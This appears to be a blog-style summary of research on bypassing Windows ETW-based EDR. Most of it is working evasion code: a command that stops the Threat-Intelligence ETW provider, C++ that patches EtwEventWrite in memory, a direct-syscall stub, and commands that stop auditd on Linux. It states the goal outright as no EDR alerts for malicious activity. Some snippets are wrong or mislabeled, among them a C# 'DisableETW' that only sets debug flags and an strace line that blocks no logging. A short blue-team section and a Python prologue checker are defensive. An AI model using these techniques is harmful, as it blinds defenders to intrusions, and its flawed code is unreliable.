Source: Binarly.io
You Should Know:
Modern Endpoint Detection and Response (EDR) solutions often rely on Event Tracing for Windows (ETW) for deep visibility into system activities. However, ETW-based detection mechanisms have inherent design flaws that attackers can exploit. Below are key techniques, commands, and code snippets to understand and bypass ETW-based EDR solutions.
1. Disabling ETW Providers
ETW providers log system events, which EDRs use for detection. Attackers can disable them using PowerShell or C#:
PowerShell Command:
logman stop "Microsoft-Windows-Threat-Intelligence" -ets
C# Code (P/Invoke):
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

public static class EtwTamper
{
    [DllImport("ntdll.dll")]
    public static extern int NtSetInformationProcess(IntPtr hProcess, int processInformationClass, ref int processInformation, int processInformationLength);

    public static void DisableETW()
    {
        // Note: information class 0x1F (31) is ProcessDebugFlags, which controls
        // debugger inheritance for the process; it does not touch ETW registration.
        int isDebuggerPresent = 1;
        NtSetInformationProcess(Process.GetCurrentProcess().Handle, 0x1F, ref isDebuggerPresent, sizeof(int));
    }
}
2. Patching ETW in Memory
Attackers can patch `EtwEventWrite` in memory to prevent logging:
x64 Assembly Patch:
mov eax, 0    ; return STATUS_SUCCESS without writing the event
ret
C++ Implementation:
#include <windows.h>

void PatchETW()
{
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    FARPROC pEtwEventWrite = GetProcAddress(hNtdll, "EtwEventWrite");
    DWORD oldProtect;
    VirtualProtect(reinterpret_cast<LPVOID>(pEtwEventWrite), 1, PAGE_EXECUTE_READWRITE, &oldProtect);
    *reinterpret_cast<BYTE*>(pEtwEventWrite) = 0xC3; // ret: first byte of the function becomes a return
    VirtualProtect(reinterpret_cast<LPVOID>(pEtwEventWrite), 1, oldProtect, &oldProtect);
}
3. Using Direct Syscalls to Bypass ETW Hooks
EDRs often hook `Nt*`/`Zw*` calls in user mode. Direct syscalls bypass these hooks:
Syscall in C (Mimikatz Style):
__declspec(naked) NTSTATUS NtAllocateVirtualMemory(
    HANDLE ProcessHandle, PVOID* BaseAddress, ULONG ZeroBits,
    PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect)
{
    // MSVC does not accept __asm or __declspec(naked) on x64; such a stub has to
    // live in a separate MASM (.asm) file to build.
    __asm {
        mov r10, rcx
        mov eax, 0x18   ; system service number: differs between Windows builds
        syscall
        ret
    }
}
4. Linux Equivalent: Bypassing Auditd (For Comparison)
On Linux, attackers may disable `auditd` to avoid logging:
Terminate Auditd:
sudo systemctl stop auditd
Prevent Logging via `strace`:
strace -e trace=none ./malicious_binary
5. Detecting ETW Tampering (Blue Team Perspective)
Defenders can check for ETW disruptions using:
PowerShell:
Get-WinEvent -ListProvider "Microsoft-Windows-Threat-Intelligence" | fl Enabled
Windows Event Logs:
Get-WinEvent -LogName "Microsoft-Windows-Threat-Intelligence/Operational"
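As an added, defender-side example that is not part of the Binarly write-up or this summary: the comparison logic an integrity scanner would apply to spot the EtwEventWrite prologue patch from section 2. Reading the live bytes from each process (ReadProcessMemory) and the reference bytes from the same ntdll.dll build on disk are assumed and stand in as constructed byte strings; the prologue bytes are a stand-in, not the real function.

```python
# Added example (not from the Binarly write-up): offline check for the
# EtwEventWrite prologue patch.  Both inputs are constructed sample bytes;
# a live scanner would supply the in-process bytes and the on-disk image bytes.
from dataclasses import dataclass
from typing import Dict, List

# Patch stubs described in section 2 (plus the common xor variant).
KNOWN_STUBS = {
    b"\xC3": "ret",
    b"\xB8\x00\x00\x00\x00\xC3": "mov eax,0 ; ret",
    b"\x33\xC0\xC3": "xor eax,eax ; ret",
}

# Constructed stand-in for a clean x64 prologue; not the real ntdll bytes.
CLEAN_PROLOGUE = bytes.fromhex("4c8bdc4883ec58498b4308498b53104d")

@dataclass
class Finding:
    patched: bool
    reason: str
    offset: int  # first differing byte, -1 when the prologue is intact

def check_prologue(in_memory: bytes, on_disk: bytes, length: int = 16) -> Finding:
    """Compare the in-memory prologue with the on-disk image bytes."""
    mem, disk = in_memory[:length], on_disk[:length]
    # Name the stub when it matches a known ETW-silencing pattern.
    for stub, name in KNOWN_STUBS.items():
        if mem.startswith(stub) and not disk.startswith(stub):
            return Finding(True, f"known stub: {name}", 0)
    # Otherwise report the first byte that differs (inline jmp hook, etc.).
    for i, (a, b) in enumerate(zip(mem, disk)):
        if a != b:
            return Finding(True, f"byte mismatch at +{i}", i)
    return Finding(False, "prologue matches image", -1)

def scan(processes: Dict[int, bytes], on_disk: bytes) -> List[int]:
    """Return the PIDs whose EtwEventWrite prologue no longer matches ntdll."""
    return [pid for pid, mem in processes.items() if check_prologue(mem, on_disk).patched]

if __name__ == "__main__":
    sample = {  # constructed: pid -> bytes read from that process
        1001: CLEAN_PROLOGUE,
        1002: b"\xC3" + CLEAN_PROLOGUE[1:],                   # section 2 patch
        1003: b"\xE9\x00\x10\x00\x00" + CLEAN_PROLOGUE[5:],   # jmp elsewhere
    }
    for pid in scan(sample, CLEAN_PROLOGUE):
        print(pid, check_prologue(sample[pid], CLEAN_PROLOGUE))
```

Compare against the ntdll build actually loaded in the process; relocations do not alter function prologues, but a different build will.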
What Undercode Says
ETW remains a critical but flawed component in modern EDR architectures. While it provides deep visibility, attackers can disable, patch, or bypass it using direct syscalls and memory manipulation. Defenders must monitor for ETW tampering and supplement detection with behavioral analytics.
Expected Output:
- Successful bypass of ETW-based detection.
- No EDR alerts triggered for malicious activity.
- Defenders see gaps in telemetry.
Prediction:
As EDRs evolve, they will likely move toward kernel-mode callbacks and AI-based anomaly detection, reducing reliance on ETW. Attackers will shift to exploiting kernel drivers or firmware for evasion.